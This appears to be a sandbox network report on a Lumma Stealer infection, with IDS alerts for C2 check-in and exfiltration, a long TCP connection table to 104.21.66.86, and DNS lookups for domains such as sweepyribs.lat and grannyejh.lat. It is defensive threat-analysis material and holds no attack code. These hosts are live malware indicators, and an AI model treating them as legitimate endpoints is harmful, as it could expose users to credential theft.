                                                                                                                                                                                                                                              2024-12-23T09:06:44.206100+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:44.975014+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:44.975014+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:46.561842+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:48.814360+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:49.473733+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449734104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:50.909006+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:53.676746+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-23T09:06:56.370335+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.66.86443TCP
                                                                                                                                                                                                                                              2024-12-23T09:07:00.486545+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.66.86443TCP
                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:38.170588017 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:38.170701027 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:38.170798063 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:38.174583912 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:38.174613953 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.564276934 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.564438105 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.570755959 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.570784092 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.571223021 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.610824108 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.676143885 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.723337889 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318363905 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318396091 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318439960 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318443060 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318461895 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318497896 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318519115 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318543911 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318543911 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318543911 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318543911 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318569899 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519197941 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519275904 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519364119 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519413948 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519443035 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519475937 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.526921988 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.527040005 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.534351110 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.534413099 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.534430027 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.534507990 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.534607887 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.535602093 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.535639048 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.682985067 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.683028936 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.683110952 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.683701992 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.683716059 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.908202887 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.908305883 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.911653042 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.911664009 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.912080050 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.913372993 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.913403034 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.913455009 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.631866932 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.631987095 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.632119894 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.946185112 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.946218014 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.995657921 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.995691061 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.995748043 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.996376038 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.996387959 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.206003904 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.206099987 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.207549095 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.207561016 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.207809925 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.211632013 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.211647034 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.211704969 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.975039005 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.975119114 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.975164890 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.975178957 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.976228952 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.976265907 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.976274967 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.977196932 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.977230072 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.977230072 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.977242947 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.977272987 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.983081102 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.993807077 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.993891001 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.993901014 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.048324108 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.048329115 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.095174074 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.095182896 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.142062902 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.166901112 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171025038 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171065092 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171083927 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171096087 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171148062 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171154976 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171174049 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171221018 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171374083 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171389103 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171411991 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171418905 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.346935987 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.347004890 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.347071886 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.347529888 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.347546101 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.561743975 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.561841965 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.563323975 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.563338041 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.563599110 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.564860106 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.565072060 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.565098047 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.565172911 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.565179110 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.501686096 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.501780033 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.501925945 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.502223015 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.502245903 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.600240946 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.600291014 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.600400925 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.600878954 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.600893974 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.814260960 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.814359903 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.816399097 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.816409111 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.816656113 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.818150043 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.818322897 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.818363905 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.473807096 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.474112988 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.474210024 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.474376917 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.474395990 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.686100006 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.686153889 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.686338902 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.686667919 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.686681986 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.908915043 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.909006119 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.911062956 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.911073923 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.911358118 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.912727118 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.912868977 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.912904978 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.913032055 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.913039923 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.030400991 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.030504942 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.030558109 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.031286001 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.031307936 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.448489904 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.448537111 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.448611021 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.449028969 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.449040890 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.676656961 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.676745892 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.678235054 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.678250074 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.678507090 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.680022001 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.680119991 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.680129051 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:54.496144056 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:54.496237040 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:54.496320963 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:54.504262924 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:54.504308939 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:55.152537107 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:55.152581930 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:55.152641058 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:55.153014898 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:55.153028011 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.370151997 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.370335102 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.371898890 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.371911049 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.372212887 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.376200914 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377208948 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377260923 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377518892 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377554893 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377670050 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377711058 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377835989 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377863884 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.378017902 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.378050089 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.378196001 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.378235102 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.378249884 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.378402948 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.378439903 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.419331074 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.419548035 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.419610977 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.419629097 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.463346004 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.464451075 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.464526892 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.464560986 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.511333942 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.511491060 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.559365034 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.738599062 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:07:00.104958057 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:07:00.105072021 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:07:00.105169058 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:07:00.105853081 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:07:00.105870008 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:07:00.154548883 CET49744443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:07:00.154583931 CET44349744104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:07:00.154756069 CET49744443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:07:00.155019999 CET49744443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:07:00.155033112 CET44349744104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:07:00.486545086 CET49744443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.516877890 CET5391453192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.654759884 CET53539141.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.672146082 CET6039453192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.809632063 CET53603941.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.812542915 CET6265953192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.952377081 CET53626591.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.955604076 CET5639053192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.093200922 CET53563901.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.105932951 CET5021453192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.244659901 CET53502141.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.263223886 CET5477953192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.402496099 CET53547791.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.470705032 CET6286953192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.663539886 CET53628691.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.668445110 CET5284653192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.806524992 CET53528461.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.810523987 CET5749153192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.948013067 CET53574911.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.951786995 CET6365353192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:38.164707899 CET53636531.1.1.1192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.539886951 CET5942953192.168.2.41.1.1.1
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.681710958 CET53594291.1.1.1192.168.2.4
                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.516877890 CET192.168.2.41.1.1.10x20faStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.672146082 CET192.168.2.41.1.1.10xa060Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
